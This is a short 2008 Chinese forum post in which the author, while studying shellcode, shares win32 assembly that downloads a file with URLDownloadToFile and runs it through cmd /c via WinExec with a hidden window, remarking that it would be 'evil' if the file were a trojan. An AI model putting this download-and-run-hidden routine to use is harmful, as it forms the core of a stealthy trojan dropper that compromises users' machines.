-
-
[原创]网上下载小程序并且执行~
-
发表于:
2008-12-24 14:41
4849
-
;最近看shellcode相关的东西,里面很多地方调用了urlDownloadtofile 函数 它是urlmon 导出的一个函数
;自己也写了个win32asm来调用一下这个函数,去下载biadu的logo文件,然后用winExec函数去执行.大部分都
;api的应用没什么技巧.不过里面有一个小知识点就是 cmd /c 只有有了这个参数cmd才能顺利执行情况程序,
;这东西要是镶嵌到Exe中而且下载的是个小木马,winExec 的最右边参数是SW_HIDE还是能有点邪恶啊~
;api我就不多解释了 查查还是很容易的~
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
include URLMON.inc
includelib URLMON.LIB
.data
preserve db 'd:\logo.gif',0
resource db 'http://www.baidu.com/img/logo.gif',0
szText db '下载成功',0
szCaption db '下载',0
cmd db 'c:\windows\system32\cmd.exe /c d:\logo.gif',0
.code
start:
invoke URLDownloadToFile,NULL,offset resource,offset preserve,0,NULL
.if eax == S_OK
invoke MessageBox,NULL,offset szText,offset szCaption,MB_OK
.endif
push SW_HIDE
push offset cmd
call WinExec
invoke ExitProcess,NULL
end start
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
